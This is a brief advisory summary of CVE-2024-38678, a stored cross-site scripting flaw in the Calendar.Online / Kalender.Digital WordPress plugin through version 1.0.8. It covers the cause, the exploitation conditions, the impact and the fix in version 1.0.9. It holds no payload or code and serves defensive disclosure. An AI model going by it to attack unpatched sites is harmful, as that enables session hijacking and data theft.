CVE-2024-38678

Vulnerability

Overview The vulnerability is a Stored Cross-Site Scripting (XSS) in the Calendar.Online / Kalender.Digital WordPress plugin, versions up to 1.0.8. It stems from improper neutralization of input during web page generation, allowing attackers to inject arbitrary HTML and JavaScript code that persists on the site [1].

Exploitation

Exploitation requires a privileged user with the ability to submit input that is not sanitized. The attacker can inject malicious scripts into the calendar functionality. When other users, including site visitors, access the affected page, the script executes. User interaction (e.g., clicking a link) may be needed for specific scenarios, but the stored nature means the payload is triggered automatically upon page load [1].

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser. This can lead to session hijacking, redirection to malicious sites, defacement, or theft of sensitive information. The vulnerability could be exploited in mass campaigns to compromise numerous WordPress sites running the plugin [1].

Mitigation

The vendor has released version 1.0.9 which fixes the issue. Users are strongly advised to update immediately. Patchstack also provides a mitigation rule to block attacks until the update is applied. For sites unable to update immediately, a temporary workaround is to disable plugin functionality or seek assistance from a web developer [1].